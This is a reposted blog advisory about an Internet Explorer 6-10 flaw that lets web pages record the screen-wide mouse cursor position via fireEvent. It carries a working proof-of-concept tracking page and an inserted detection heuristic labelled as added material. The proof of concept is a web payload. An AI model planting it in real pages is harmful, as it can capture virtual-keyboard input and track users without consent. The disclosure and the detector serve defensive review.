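A foreign website recently disclosed a new IE vulnerability that allows an attacker to track the mouse cursor anywhere on the screen. This compromises secure virtual keyboards, letting an attacker obtain sensitive user information just as a keylogger would. Although the vulnerability has been reported, and advertisers have already exploited it across billions of ad impressions, Microsoft researchers say there is no plan to fix it in the near term. According to reports, every browser version Microsoft currently supports is affected, including IE6, IE7, IE8, IE9 and IE10.
By using fireEvent to trigger the onmousemove event, the complete path of the mouse's movement can be recorded, and the current mouse coordinates can be obtained even when IE is minimized or is not the active window. The PoC is as follows: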
```html
<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8" />
  <title>Exploit Demo</title>
  <script type="text/javascript">
    window.attachEvent("onload", function() {
      var detector = document.getElementById("detector");
      // The handler displays the screen coordinates carried by the event object
      detector.attachEvent("onmousemove", function (e) {
        detector.innerHTML = e.screenX + ", " + e.screenY;
      });
      // Fire onmousemove synthetically every 100 ms, without any real mouse movement
      setInterval(function () {
        detector.fireEvent("onmousemove");
      }, 100);
    });
  </script>
</head>
<body>
  <div id="detector"></div>
</body>
</html>
```
```html
<HTML>
<HEAD>
<SCRIPT>
function fnFireEvents()
{
    div.innerText = "The cursor has moved over me!";
    btn.fireEvent("onclick");
}
</SCRIPT>
</HEAD>
<BODY>
<h1>Using the fireEvent method</h1>
By moving the cursor over the DIV below, the button is clicked.
<DIV ID="div" onmouseover="fnFireEvents();">
Mouse over this!
</DIV>
<BUTTON ID="btn" ONCLICK="this.innerText='I have been clicked!'">Button</BUTTON>
</BODY>
</HTML>
```
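For reviewing ad creatives or third-party scripts for the pattern in the PoC above, the following static heuristic (an added example, not part of the original post) flags inline scripts that both fire a mouse event through fireEvent and read screenX/screenY, and rates timer-driven cases higher. The function names, the severity labels, the `report` callback and both sample pages are constructed for illustration.

```javascript
// Added example (not from the original post). Sample pages are constructed.
const MOUSE_EVENTS = "onmousemove|onmouseover|onmousedown|onmouseup|onclick";
// Synthetic dispatch of a mouse event, e.g. el.fireEvent("onmousemove")
const FIRE_RE = new RegExp(`\\.fireEvent\\(\\s*["'](${MOUSE_EVENTS})["']`, "gi");
// Reads of screen-relative cursor coordinates from an event object
const COORD_RE = /\.(screenX|screenY)\b/g;
// Timer use turns a single coordinate read into continuous polling
const TIMER_RE = /\bset(?:Interval|Timeout)\s*\(/;

// Return the bodies of inline <script> elements (regex-based, review aid only).
function extractScripts(html) {
  const re = /<script\b[^>]*>([\s\S]*?)<\/script\s*>/gi;
  return [...html.matchAll(re)].map((m) => m[1]);
}

// Flag scripts that both fire a mouse event synthetically and read screenX/Y.
function scanPage(html) {
  const findings = [];
  extractScripts(html).forEach((src, index) => {
    const events = new Set([...src.matchAll(FIRE_RE)].map((m) => m[1].toLowerCase()));
    const coords = new Set([...src.matchAll(COORD_RE)].map((m) => m[1]));
    if (events.size === 0 || coords.size === 0) return; // need both halves
    findings.push({
      script: index,
      events: [...events].sort(),
      coords: [...coords].sort(),
      severity: TIMER_RE.test(src) ? "high" : "medium",
    });
  });
  return findings;
}

// Constructed sample 1: same shape as the PoC (timer + fireEvent + screenX/Y).
// `report` is a hypothetical callback standing in for whatever consumes the data.
const SAMPLE_TRACKER = `<html><head><script type="text/javascript">
var d = document.getElementById("detector");
d.attachEvent("onmousemove", function (e) { report(e.screenX, e.screenY); });
setInterval(function () { d.fireEvent("onmousemove"); }, 100);
</script></head><body><div id="detector"></div></body></html>`;

// Constructed sample 2: fireEvent used for a click, no coordinate reads.
const SAMPLE_BENIGN = `<html><head><script>
function fnFireEvents() { btn.fireEvent("onclick"); }
</script></head><body><button id="btn">Button</button></body></html>`;

console.log(JSON.stringify(scanPage(SAMPLE_TRACKER)));
console.log(JSON.stringify(scanPage(SAMPLE_BENIGN)));
```

The heuristic only sees inline, unobfuscated script text, so it is a triage aid for manual review and not a complete detector.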
Video demonstration:
Reference:
IE website mouse-tracking vulnerability exposed, user privacy threatened
IE (6-10) mouse tracking vulnerability
http://v.youku.com/v_show/id_XNDg3NjIxMzA4.html
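This blog rarely reposts other people's articles. Unless otherwise indicated, all posts are original; when reposting, please credit the source:
This article is from 程序人生 >> [Repost] IE Mouse Tracking Vulnerability
Author: 代码疯子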